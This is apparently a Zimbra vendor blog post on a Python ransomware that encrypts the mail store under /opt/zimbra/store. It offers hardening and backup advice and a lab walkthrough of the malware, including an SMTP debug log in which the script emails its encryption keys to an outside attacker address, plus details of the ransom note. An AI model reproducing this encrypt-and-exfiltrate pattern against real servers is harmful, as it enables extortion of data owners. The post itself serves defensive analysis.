Security news – Zimbra ransomware written in python

Lawrence Abrams of Bleeping Computer has reported that there is a new ransomware variant, written in Python, that is targeting ZCS server data under /opt/zimbra/store/.

Note: You might have read some articles about this issue, where the articles try to encourage the user to download software to remove a possible ransomware, usually this articles or pages are tools for Windows™ operating system which contains spyware and other kind of malware, etc. Please avoid this kind of articles, Zimbra Collaboration doesn’t run on Windows™ OS, and the possible Zimbra ransomware needs shell access to being executed, which means this is not a Zimbra issue related itself, and it’s a more a wrong secured environment, specially at SSH level.

How can you protect your Server/s from this, or other, ransomware?

At this point, no details have been provided about how any servers were compromised. Without any details, the best advice we can give is:

  • Get (and stay) up to date on OS version and patches.
  • Get (and stay) up to date on Zimbra Collaboration version and patches.
  • Ensure servers are properly firewalled (see Ports) and only allow access to the minimum number of services that is required to meet your business requirements.
  • Review and compare your system configuration against best practices like the CIS benchmarks.
  • Protect your SSH with Fail2Ban or other security methods. If possible, secure the SSH access through VPN, and always use Public/Private Keys to access instead of passwords.

What can I do if I have been infected by this ransomware?

We strongly recommend opening a Support Ticket with our Engineers as soon as possible on the Support Portal.

If you are a Network Edition Customer, please be sure you have enabled and are running the Backup & Restore feature we include with our product. Also ensure that you actually have recent files on the backup directory, for example:

root@mail:~# ls /opt/zimbra/backup/sessions/ -la
total 172
drwxr-x--- 43 zimbra zimbra 4096 Jun 23 01:00 .
drwxr-xr-x  4 zimbra zimbra 4096 Jun 23 00:00 ..
drwxr-x---  6 zimbra zimbra 4096 Jun 19 01:00 full-20160619.050020.544
drwxr-x---  6 zimbra zimbra 4096 Jun 19 01:00 incr-20160619.050008.658
drwxr-x---  6 zimbra zimbra 4096 Jun 20 01:00 incr-20160620.050009.077
drwxr-x---  6 zimbra zimbra 4096 Jun 21 01:00 incr-20160621.050009.873
drwxr-x---  6 zimbra zimbra 4096 Jun 22 01:00 incr-20160622.050011.071
drwxr-x---  6 zimbra zimbra 4096 Jun 23 01:00 incr-20160623.050009.101

 

If you are running the Open Source version of our product, make sure you have a rsync of the entire /opt/zimbra by following some of the articles on our Wiki, and please let us know your issue in our Community Forums thread, where the Community can help you.

How does this Zimbra ransomware work?

In our lab, we needed to install a couple of python dependencies to make the Script work, which means that this issue needs shell access by SSH first to install all the dependencies:

  • python-dev
  • pip install pycrypto

Once the Zimbra ransomware has been executed, the script goes through the entire /opt/zimbra/store folder; encrypts all the files using AES encryption; and adds a .crypto extension. At the same time, the script creates an email that is sent to the, unidentified, attacker. It then creates a note in /root/how.txt demanding 3 bitcoins to get the files back.

Here is how it looks when we run the process on a test server:

AY6ZxcQ+EXwtBYnM3KKyzKBcYAvJRoCa
send: 'ehlo zimbraransom.zimbra.io\r\n'
reply: '250-mail.com Hello zimbraransom.zimbra.io [XX.XX.XX.XX]\r\n'
reply: '250-SIZE 157286400\r\n'
reply: '250 STARTTLS\r\n'
reply: retcode (250); Msg: mail.com Hello zimbraransom.zimbra.io [XX.XX.XX.XX]
SIZE 157286400
STARTTLS
send: 'mail FROM:<support@mail.com> size=2174\r\n'
reply: '250 Requested mail action okay, completed\r\n'
reply: retcode (250); Msg: Requested mail action okay, completed
send: 'rcpt TO:<mpritsken@priest.com>\r\n'
reply: '250 OK\r\n'
reply: retcode (250); Msg: OK
send: 'data\r\n'
reply: '354 Start mail input; end with <CRLF>.<CRLF>\r\n'
reply: retcode (354); Msg: Start mail input; end with <CRLF>.<CRLF>
data: (354, 'Start mail input; end with <CRLF>.<CRLF>')
send: 'PuK: -----BEGIN PUBLIC KEY-----\r\n
MIIBIjANBgkqhkiG9wr\n
-----END PUBLIC KEY-----\r\n
PrK: -----BEGIN RSA PRIVATE KEY-----\r\n
MIIEoQIBAAKCAQEAoFGbiLdpi0cWnDujKyKhWbSYpx\r\n
-----END RSA PRIVATE KEY-----\r\n
EAS: AY6ZxcQ+EXwtBYnM3KKyzKBcYAvJRoCa\r\n.\r\n'
reply: '250 Requested mail action okay, completed: id=0Lwbov-1bR4xk2xH5-018KEZ\r\n'
reply: retcode (250); Msg: Requested mail action okay, completed: id=0Lwbov-1bR4xk2xH5-018KEZ
data: (250, 'Requested mail action okay, completed: id=0Lwbov-1bR4xk2xH5-018KEZ')
send: 'quit\r\n'
reply: '221 mail.com Service closing transmission channel\r\n'
reply: retcode (221); Msg: mail.com Service closing transmission channel

Once encrypted, any files under /opt/zimbra/store are not available anymore, and shows the .crypto extension on them:

root@zimbraransom:~# ls -la /opt/zimbra/store/
total 16
drwxr-xr-x 2 root root 4096 Jun 23 13:15 .
drwxr-xr-x 3 root root 4096 Jun 23 13:14 ..
-rw-r--r-- 1 root root   40 Jun 23 13:15 file2.txt.crypto
-rw-r--r-- 1 root root   40 Jun 23 13:15 hello.txt.crypto

Keep us posted on this Blog article, or in the official Forum thread for this issue – https://forums.zimbra.org/viewtopic.php?t=59774

, ,

Comments are closed.